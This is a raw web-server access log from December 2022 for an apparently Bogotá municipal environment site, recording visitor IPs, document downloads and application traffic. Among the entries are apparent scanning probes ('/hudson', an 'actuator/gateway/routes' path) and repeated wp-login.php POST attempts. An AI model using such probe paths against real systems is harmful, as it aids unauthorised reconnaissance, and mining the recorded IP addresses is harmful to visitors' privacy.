157.55.39.172 - - [18/Dec/2022:13:11:56 -0500] "GET /bla/resoluciones/resoluciones%202012/1452.pdf HTTP/1.1" 304 -
172.22.2.4 - - [18/Dec/2022:13:10:39 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59404
173.252.127.7 - - [18/Dec/2022:13:12:24 -0500] "GET /images/cr\xc3\xb3nica-29-nov-1_optimized.jpeg HTTP/1.1" 404 1034
173.252.79.11 - - [18/Dec/2022:13:14:12 -0500] "GET /images/Entrenubes%201%20(1)%20(1).jpeg HTTP/1.1" 200 70096
114.119.149.91 - - [18/Dec/2022:13:14:30 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS%2B2006/ HTTP/1.1" 200 13279
162.55.166.12 - - [18/Dec/2022:13:15:45 -0500] "GET / HTTP/1.1" 200 319
162.55.37.148 - - [18/Dec/2022:13:15:54 -0500] "GET / HTTP/1.1" 200 319
216.245.221.92 - - [18/Dec/2022:13:16:40 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [18/Dec/2022:13:16:54 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
125.209.235.172 - - [18/Dec/2022:13:17:17 -0500] "-" 408 -
172.22.2.4 - - [18/Dec/2022:13:15:39 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [18/Dec/2022:13:16:29 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59404
157.55.39.172 - - [18/Dec/2022:13:19:17 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/5252.pdf HTTP/1.1" 304 -
201.245.192.253 - - [18/Dec/2022:13:20:45 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44098
201.245.192.253 - - [18/Dec/2022:13:20:47 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43944
216.245.221.92 - - [18/Dec/2022:13:21:40 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [18/Dec/2022:13:21:53 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [18/Dec/2022:13:21:29 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [18/Dec/2022:13:22:19 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59779
66.220.149.10 - - [18/Dec/2022:13:24:34 -0500] "GET /images/cr\xc3\xb3nica-29-nov-1_optimized.jpeg HTTP/1.1" 404 1034
181.61.208.55 - - [18/Dec/2022:13:25:25 -0500] "GET /secretaria-de-ambiente-reconocio-las-234-empresas-y-entidades-con-mejores-estrategias-de-gestion-ambiental.html HTTP/1.1" 200 1048
216.245.221.92 - - [18/Dec/2022:13:26:40 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [18/Dec/2022:13:26:52 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
66.249.66.85 - - [18/Dec/2022:13:28:45 -0500] "-" 408 -
172.22.2.4 - - [18/Dec/2022:13:27:19 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [18/Dec/2022:13:28:09 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 51643
95.217.144.240 - - [18/Dec/2022:13:29:50 -0500] "-" 408 -
95.217.144.240 - - [18/Dec/2022:13:29:50 -0500] "-" 408 -
95.217.144.240 - - [18/Dec/2022:13:29:50 -0500] "-" 408 -
95.217.144.245 - - [18/Dec/2022:13:30:06 -0500] "-" 408 -
95.217.144.250 - - [18/Dec/2022:13:30:06 -0500] "-" 408 -
95.217.144.250 - - [18/Dec/2022:13:30:12 -0500] "-" 408 -
95.217.144.250 - - [18/Dec/2022:13:30:15 -0500] "-" 408 -
95.217.144.245 - - [18/Dec/2022:13:30:17 -0500] "-" 408 -
95.217.144.240 - - [18/Dec/2022:13:30:17 -0500] "-" 408 -
95.217.144.240 - - [18/Dec/2022:13:30:18 -0500] "-" 408 -
95.217.144.240 - - [18/Dec/2022:13:30:19 -0500] "-" 408 -
95.217.144.240 - - [18/Dec/2022:13:30:28 -0500] "-" 408 -
95.217.144.250 - - [18/Dec/2022:13:30:29 -0500] "-" 408 -
95.217.144.250 - - [18/Dec/2022:13:30:32 -0500] "-" 408 -
95.217.144.250 - - [18/Dec/2022:13:30:35 -0500] "-" 408 -
95.217.144.240 - - [18/Dec/2022:13:30:40 -0500] "-" 408 -
95.217.144.240 - - [18/Dec/2022:13:30:40 -0500] "-" 408 -
95.217.144.250 - - [18/Dec/2022:13:30:42 -0500] "-" 408 -
95.217.144.250 - - [18/Dec/2022:13:30:45 -0500] "-" 408 -
95.217.144.250 - - [18/Dec/2022:13:30:45 -0500] "-" 408 -
95.217.144.250 - - [18/Dec/2022:13:30:46 -0500] "-" 408 -
201.245.192.253 - - [18/Dec/2022:13:30:45 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44098
95.217.144.250 - - [18/Dec/2022:13:30:48 -0500] "-" 408 -
201.245.192.253 - - [18/Dec/2022:13:30:48 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43944
95.217.144.250 - - [18/Dec/2022:13:30:51 -0500] "-" 408 -
95.217.144.250 - - [18/Dec/2022:13:30:54 -0500] "-" 408 -
95.217.144.250 - - [18/Dec/2022:13:30:56 -0500] "-" 408 -
95.217.144.250 - - [18/Dec/2022:13:30:56 -0500] "-" 408 -
95.217.144.250 - - [18/Dec/2022:13:30:56 -0500] "-" 408 -
95.217.144.250 - - [18/Dec/2022:13:30:56 -0500] "-" 408 -
216.245.221.92 - - [18/Dec/2022:13:31:40 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [18/Dec/2022:13:31:52 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
66.249.73.88 - - [18/Dec/2022:13:34:05 -0500] "-" 408 -
207.46.13.174 - - [18/Dec/2022:13:34:44 -0500] "GET /BLA/resoluciones/AUTOS%202022/7692.pdf HTTP/1.1" 200 382068
172.22.2.4 - - [18/Dec/2022:13:33:09 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [18/Dec/2022:13:33:59 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 48801
172.22.2.4 - - [18/Dec/2022:13:34:43 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 32715
216.245.221.92 - - [18/Dec/2022:13:36:40 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [18/Dec/2022:13:36:51 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
207.46.13.174 - - [18/Dec/2022:13:39:03 -0500] "GET /BLA/resoluciones/AUTOS%202022/5019.pdf HTTP/1.1" 200 370205
172.22.2.4 - - [18/Dec/2022:13:38:59 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [18/Dec/2022:13:40:45 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44098
201.245.192.253 - - [18/Dec/2022:13:40:48 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43944
192.241.201.172 - - [18/Dec/2022:13:41:03 -0500] "GET /hudson HTTP/1.1" 404 1018
172.22.2.4 - - [18/Dec/2022:13:39:49 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59779
216.245.221.92 - - [18/Dec/2022:13:41:40 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [18/Dec/2022:13:41:51 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [18/Dec/2022:13:43:05 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%2013%20del%2006%20de%20Septiembre%20de%202012.pdf HTTP/1.1" 304 -
157.55.39.152 - - [18/Dec/2022:13:45:57 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [18/Dec/2022:13:44:49 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [18/Dec/2022:13:46:40 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [18/Dec/2022:13:46:49 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
186.1.141.186 - - [18/Dec/2022:13:47:06 -0500] "GET /appsia/controlador HTTP/1.1" 200 4799
172.22.2.4 - - [18/Dec/2022:13:46:20 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 32715
186.1.141.186 - - [18/Dec/2022:13:47:08 -0500] "GET /appsia/scripts/validarIngreso.js HTTP/1.1" 200 851
186.1.141.186 - - [18/Dec/2022:13:47:08 -0500] "GET /appsia/images/cabezoteHojaVida.png HTTP/1.1" 200 32493
186.1.141.186 - - [18/Dec/2022:13:47:09 -0500] "GET /appsia/images/logo_bogota_p.png HTTP/1.1" 200 14951
186.1.141.186 - - [18/Dec/2022:13:47:13 -0500] "POST /appsia/controlador HTTP/1.1" 200 4621
186.1.141.186 - - [18/Dec/2022:13:47:16 -0500] "POST /appsia/controlador HTTP/1.1" 200 7723
186.1.141.186 - - [18/Dec/2022:13:47:17 -0500] "GET /appsia/images/logo_escudo.png HTTP/1.1" 200 36965
172.22.2.4 - - [18/Dec/2022:13:45:39 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54816
157.55.39.172 - - [18/Dec/2022:13:48:58 -0500] "GET /Publicaciones/2022EE27824.pdf HTTP/1.1" 404 227
216.245.221.92 - - [18/Dec/2022:13:51:40 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [18/Dec/2022:13:51:47 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [18/Dec/2022:13:50:39 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
31.13.127.118 - - [18/Dec/2022:13:52:22 -0500] "GET /images/cr\xc3\xb3nica-29-nov-1_optimized.jpeg HTTP/1.1" 404 1034
172.22.2.4 - - [18/Dec/2022:13:51:29 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59404
66.220.149.24 - - [18/Dec/2022:13:53:58 -0500] "GET /images/cr\xc3\xb3nica-29-nov-1_optimized.jpeg HTTP/1.1" 404 1034
216.245.221.92 - - [18/Dec/2022:13:56:40 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [18/Dec/2022:13:56:45 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [18/Dec/2022:13:57:38 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/ANALISIST-257-96.docx HTTP/1.1" 304 -
114.119.151.63 - - [18/Dec/2022:13:57:49 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS%2B2005/&sort=name&order=asc HTTP/1.1" 200 13279
172.22.2.4 - - [18/Dec/2022:13:56:29 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [18/Dec/2022:13:57:19 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57824
199.59.150.183 - - [18/Dec/2022:14:00:02 -0500] "GET /images/cr%C3%B3nica-29-nov-1_optimized.jpeg HTTP/1.1" 404 1034
216.245.221.92 - - [18/Dec/2022:14:01:40 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [18/Dec/2022:14:01:45 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
95.217.144.250 - - [18/Dec/2022:14:01:58 -0500] "-" 408 -
172.22.2.4 - - [18/Dec/2022:14:01:22 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 32715
172.22.2.4 - - [18/Dec/2022:14:02:19 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [18/Dec/2022:14:03:09 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56474
216.245.221.92 - - [18/Dec/2022:14:06:40 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [18/Dec/2022:14:06:44 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
199.16.157.182 - - [18/Dec/2022:14:08:14 -0500] "GET /images/desayuno-por-el-clima-del-c40-cop26-3-nov.jpg HTTP/1.1" 200 103146
172.22.2.4 - - [18/Dec/2022:14:08:09 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [18/Dec/2022:14:08:59 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59779
216.245.221.92 - - [18/Dec/2022:14:11:40 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [18/Dec/2022:14:11:43 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [18/Dec/2022:14:13:59 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [18/Dec/2022:14:14:49 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54816
216.245.221.92 - - [18/Dec/2022:14:16:40 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [18/Dec/2022:14:16:42 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
185.119.81.104 - - [18/Dec/2022:14:18:29 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.104 - - [18/Dec/2022:14:18:30 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
181.60.241.182 - - [18/Dec/2022:14:20:21 -0500] "HEAD /appsia/controlador HTTP/1.1" 200 -
181.60.241.182 - - [18/Dec/2022:14:20:21 -0500] "GET /appsia/controlador HTTP/1.1" 200 4799
181.60.241.182 - - [18/Dec/2022:14:20:22 -0500] "GET /appsia/controlador HTTP/1.1" 200 4799
181.60.241.182 - - [18/Dec/2022:14:20:22 -0500] "GET /appsia/css/estilos.css HTTP/1.1" 200 4804
181.60.241.182 - - [18/Dec/2022:14:20:22 -0500] "GET /appsia/scripts/validarIngreso.js HTTP/1.1" 200 851
181.60.241.182 - - [18/Dec/2022:14:20:22 -0500] "GET /appsia/images/logo_bogota_p.png HTTP/1.1" 200 14951
181.60.241.182 - - [18/Dec/2022:14:20:22 -0500] "GET /appsia/images/cabezoteHojaVida.png HTTP/1.1" 200 32493
181.60.241.182 - - [18/Dec/2022:14:20:22 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
201.245.192.253 - - [18/Dec/2022:14:20:45 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43960
201.245.192.253 - - [18/Dec/2022:14:20:48 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44090
172.22.2.4 - - [18/Dec/2022:14:19:49 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [18/Dec/2022:14:21:40 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [18/Dec/2022:14:21:41 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
181.60.241.182 - - [18/Dec/2022:14:21:56 -0500] "POST /appsia/controlador HTTP/1.1" 200 3600
181.60.241.182 - - [18/Dec/2022:14:21:56 -0500] "GET /appsia/jscripts/validarSolicitud.js HTTP/1.1" 404 68
181.60.241.182 - - [18/Dec/2022:14:22:12 -0500] "POST /appsia/controlador HTTP/1.1" 200 4799
172.22.2.4 - - [18/Dec/2022:14:20:39 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59404
181.60.241.182 - - [18/Dec/2022:14:22:28 -0500] "POST /appsia/controlador HTTP/1.1" 200 3600
181.60.241.182 - - [18/Dec/2022:14:22:28 -0500] "GET /appsia/jscripts/validarSolicitud.js HTTP/1.1" 404 68
181.60.241.182 - - [18/Dec/2022:14:23:06 -0500] "HEAD /appsia/controlador HTTP/1.1" 200 -
181.60.241.182 - - [18/Dec/2022:14:23:06 -0500] "GET /appsia/controlador HTTP/1.1" 200 4799
181.60.241.182 - - [18/Dec/2022:14:23:06 -0500] "GET /appsia/controlador HTTP/1.1" 200 4799
207.46.13.198 - - [18/Dec/2022:14:23:40 -0500] "GET /BLA/resoluciones/AUTOS%202022/3691.pdf HTTP/1.1" 200 539449
66.249.73.86 - - [18/Dec/2022:14:24:22 -0500] "-" 408 -
181.60.241.182 - - [18/Dec/2022:14:24:54 -0500] "POST /appsia/controlador HTTP/1.1" 200 3600
181.60.241.182 - - [18/Dec/2022:14:24:54 -0500] "GET /appsia/jscripts/validarSolicitud.js HTTP/1.1" 404 68
181.60.241.182 - - [18/Dec/2022:14:24:57 -0500] "POST /appsia/controlador HTTP/1.1" 200 4799
181.60.241.182 - - [18/Dec/2022:14:25:05 -0500] "POST /appsia/controlador HTTP/1.1" 200 4621
181.60.241.182 - - [18/Dec/2022:14:25:10 -0500] "POST /appsia/controlador HTTP/1.1" 200 7732
181.60.241.182 - - [18/Dec/2022:14:25:10 -0500] "GET /appsia/images/logo_escudo.png HTTP/1.1" 200 36965
216.245.221.92 - - [18/Dec/2022:14:26:40 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [18/Dec/2022:14:26:40 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [18/Dec/2022:14:25:39 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
173.252.95.6 - - [18/Dec/2022:14:27:21 -0500] "GET /garza-azul-nueva-ave-registrada-en-el-humedal-el-burro.html HTTP/1.1" 206 890
172.22.2.4 - - [18/Dec/2022:14:27:00 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 20427
172.22.2.4 - - [18/Dec/2022:14:26:29 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57824
201.245.192.253 - - [18/Dec/2022:14:30:45 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43960
201.245.192.253 - - [18/Dec/2022:14:30:48 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44090
207.46.13.174 - - [18/Dec/2022:14:31:05 -0500] "GET /bla/resoluciones/notificaciones/autos%202018/04787.pdf HTTP/1.1" 304 -
216.245.221.92 - - [18/Dec/2022:14:31:40 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [18/Dec/2022:14:31:39 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
66.249.73.84 - - [18/Dec/2022:14:32:04 -0500] "-" 408 -
207.46.13.198 - - [18/Dec/2022:14:32:15 -0500] "GET /bla/resoluciones/notificaciones/autos%202017/00967.doc HTTP/1.1" 304 -
172.22.2.4 - - [18/Dec/2022:14:31:29 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.66.85 - - [18/Dec/2022:14:33:15 -0500] "-" 408 -
172.22.2.4 - - [18/Dec/2022:14:32:19 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57192
114.119.159.183 - - [18/Dec/2022:14:34:06 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/3643.pdf HTTP/1.1" 200 9942149
216.245.221.92 - - [18/Dec/2022:14:36:40 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [18/Dec/2022:14:36:38 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
186.85.177.69 - - [18/Dec/2022:14:38:04 -0500] "GET /todo-un-exito-la-primera-jornada-de-adopcion-en-la-santamaria-15-perros-y-gatos-encontraron-un-nuevo-hogar-en-bogota.html HTTP/1.1" 200 994
172.22.2.4 - - [18/Dec/2022:14:37:19 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [18/Dec/2022:14:39:17 -0500] "GET /BLA/boletinlegal/actuator/gateway/routes HTTP/1.1" 404 1018
172.22.2.4 - - [18/Dec/2022:14:38:09 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56825
201.245.192.253 - - [18/Dec/2022:14:40:45 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43960
201.245.192.253 - - [18/Dec/2022:14:40:47 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44090
201.245.192.253 - - [18/Dec/2022:14:41:37 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.245.221.92 - - [18/Dec/2022:14:41:40 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [18/Dec/2022:14:43:09 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
157.55.39.35 - - [18/Dec/2022:14:45:29 -0500] "GET / HTTP/1.1" 200 4720
94.102.61.10 - - [18/Dec/2022:14:45:34 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [18/Dec/2022:14:43:59 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59404
201.245.192.253 - - [18/Dec/2022:14:46:36 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.245.221.92 - - [18/Dec/2022:14:46:40 -0500] "HEAD / HTTP/1.1" 200 -
186.84.20.209 - - [18/Dec/2022:14:48:51 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2018%2F HTTP/1.1" 200 273306
172.22.2.4 - - [18/Dec/2022:14:48:59 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [18/Dec/2022:14:49:49 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56079
201.245.192.253 - - [18/Dec/2022:14:51:35 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.245.221.92 - - [18/Dec/2022:14:51:40 -0500] "HEAD / HTTP/1.1" 200 -
116.202.20.140 - - [18/Dec/2022:14:51:42 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [18/Dec/2022:14:54:49 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [18/Dec/2022:14:56:33 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.245.221.92 - - [18/Dec/2022:14:56:39 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [18/Dec/2022:14:55:39 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59404
185.119.81.104 - - [18/Dec/2022:14:57:28 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.104 - - [18/Dec/2022:14:57:29 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3650
95.217.144.240 - - [18/Dec/2022:14:57:49 -0500] "-" 408 -
157.55.39.172 - - [18/Dec/2022:14:59:35 -0500] "GET /BLA/resoluciones/AUTOS%202012/1466.pdf HTTP/1.1" 304 -
185.119.81.97 - - [18/Dec/2022:15:00:32 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.97 - - [18/Dec/2022:15:00:33 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
172.22.2.4 - - [18/Dec/2022:15:01:28 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9566
201.245.192.253 - - [18/Dec/2022:15:01:32 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.245.221.92 - - [18/Dec/2022:15:01:40 -0500] "HEAD / HTTP/1.1" 200 -
66.249.73.86 - - [18/Dec/2022:15:01:58 -0500] "-" 408 -
172.22.2.4 - - [18/Dec/2022:15:00:39 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [18/Dec/2022:15:01:29 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56079
201.245.192.253 - - [18/Dec/2022:15:06:31 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.245.221.92 - - [18/Dec/2022:15:06:39 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [18/Dec/2022:15:06:29 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [18/Dec/2022:15:07:19 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55680
201.245.192.253 - - [18/Dec/2022:15:11:29 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.245.221.92 - - [18/Dec/2022:15:11:39 -0500] "HEAD / HTTP/1.1" 200 -
173.252.83.116 - - [18/Dec/2022:15:13:17 -0500] "GET /images/adopci\xc3\xb3n-1_optimized.jpeg HTTP/1.1" 404 1034
172.22.2.4 - - [18/Dec/2022:15:13:47 -0500] "GET /BLA/boletinlegal/style.css HTTP/1.1" 200 9406
172.22.2.4 - - [18/Dec/2022:15:13:47 -0500] "GET /BLA/boletinlegal/styles2.css HTTP/1.1" 200 1838
172.22.2.4 - - [18/Dec/2022:15:13:47 -0500] "GET /BLA/boletinlegal/js/jquery.js HTTP/1.1" 200 57254
172.22.2.4 - - [18/Dec/2022:15:13:47 -0500] "GET /BLA/boletinlegal/js/jquery.scrollTo-min.js HTTP/1.1" 200 1150
172.22.2.4 - - [18/Dec/2022:15:13:47 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
172.22.2.4 - - [18/Dec/2022:15:13:47 -0500] "GET /BLA/boletinlegal/images/cabezote%20BLEGAL.jpg HTTP/1.1" 200 118164
172.22.2.4 - - [18/Dec/2022:15:13:47 -0500] "GET /BLA/boletinlegal/images/subscribe-icon-big.png HTTP/1.1" 200 47702
172.22.2.4 - - [18/Dec/2022:15:13:47 -0500] "GET /BLA/boletinlegal/images/historia.png HTTP/1.1" 200 52775
172.22.2.4 - - [18/Dec/2022:15:13:47 -0500] "GET /BLA/boletinlegal/images/registro-usuarios.png HTTP/1.1" 200 8106
172.22.2.4 - - [18/Dec/2022:15:13:47 -0500] "GET /BLA/boletinlegal/images/arr_l.jpg HTTP/1.1" 200 1979
172.22.2.4 - - [18/Dec/2022:15:13:47 -0500] "GET /BLA/boletinlegal/images/screen_1.png HTTP/1.1" 200 202547
172.22.2.4 - - [18/Dec/2022:15:13:47 -0500] "GET /BLA/boletinlegal/images/launch.jpg HTTP/1.1" 200 14577
172.22.2.4 - - [18/Dec/2022:15:13:47 -0500] "GET /BLA/boletinlegal/images/body_bg.jpg HTTP/1.1" 200 1601
172.22.2.4 - - [18/Dec/2022:15:13:47 -0500] "GET /BLA/boletinlegal/images/menu_lft.gif HTTP/1.1" 200 1713
172.22.2.4 - - [18/Dec/2022:15:13:47 -0500] "GET /BLA/boletinlegal/images/menu_rght.gif HTTP/1.1" 200 1627
172.22.2.4 - - [18/Dec/2022:15:13:47 -0500] "GET /BLA/boletinlegal/images/bg_top.jpg HTTP/1.1" 200 522
172.22.2.4 - - [18/Dec/2022:15:13:47 -0500] "GET /BLA/boletinlegal/images/menu_bg.jpg HTTP/1.1" 200 620
172.22.2.4 - - [18/Dec/2022:15:13:47 -0500] "GET /BLA/boletinlegal/images/hover.jpg HTTP/1.1" 200 640
172.22.2.4 - - [18/Dec/2022:15:13:47 -0500] "GET /BLA/boletinlegal/images/text.jpg HTTP/1.1" 200 568
172.22.2.4 - - [18/Dec/2022:15:13:48 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9566
172.22.2.4 - - [18/Dec/2022:15:13:48 -0500] "GET /BLA/boletinlegal/niceforms-default.css HTTP/1.1" 200 6694
172.22.2.4 - - [18/Dec/2022:15:13:48 -0500] "GET /BLA/boletinlegal/js/jquery1.js HTTP/1.1" 200 29846
172.22.2.4 - - [18/Dec/2022:15:13:48 -0500] "GET /BLA/boletinlegal/js/lib.js HTTP/1.1" 200 6474
172.22.2.4 - - [18/Dec/2022:15:13:48 -0500] "GET /BLA/boletinlegal/js/ajax_actos.js HTTP/1.1" 200 1322
172.22.2.4 - - [18/Dec/2022:15:13:48 -0500] "GET /BLA/boletinlegal/niceforms.js HTTP/1.1" 200 22876
172.22.2.4 - - [18/Dec/2022:15:13:48 -0500] "GET /BLA/boletinlegal/js/popup.js HTTP/1.1" 200 1270
172.22.2.4 - - [18/Dec/2022:15:13:48 -0500] "GET /BLA/boletinlegal/images/green-yellow-blue-pink-th.png HTTP/1.1" 200 7394
172.22.2.4 - - [18/Dec/2022:15:13:48 -0500] "GET /BLA/boletinlegal/images/tel.png HTTP/1.1" 200 14477
172.22.2.4 - - [18/Dec/2022:15:13:48 -0500] "GET /BLA/boletinlegal/images/icono-email.png HTTP/1.1" 200 5544
172.22.2.4 - - [18/Dec/2022:15:13:48 -0500] "GET /BLA/boletinlegal/images/footer_bg.jpg HTTP/1.1" 200 586
172.22.2.4 - - [18/Dec/2022:15:13:49 -0500] "GET /BLA/boletinlegal/images/footer_bg_l.jpg HTTP/1.1" 200 776
172.22.2.4 - - [18/Dec/2022:15:13:49 -0500] "GET /BLA/boletinlegal/img/0.png HTTP/1.1" 200 110
172.22.2.4 - - [18/Dec/2022:15:13:49 -0500] "GET /BLA/boletinlegal/img/select-left.png HTTP/1.1" 200 263
172.22.2.4 - - [18/Dec/2022:15:13:49 -0500] "GET /BLA/boletinlegal/img/button-left.png HTTP/1.1" 200 57071
172.22.2.4 - - [18/Dec/2022:15:13:49 -0500] "GET /BLA/boletinlegal/img/button.png HTTP/1.1" 200 43241
172.22.2.4 - - [18/Dec/2022:15:13:49 -0500] "GET /BLA/boletinlegal/img/select-right.png HTTP/1.1" 200 44019
172.22.2.4 - - [18/Dec/2022:15:13:49 -0500] "GET /BLA/boletinlegal/img/button-right.png HTTP/1.1" 200 57878
172.22.2.4 - - [18/Dec/2022:15:13:49 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1326
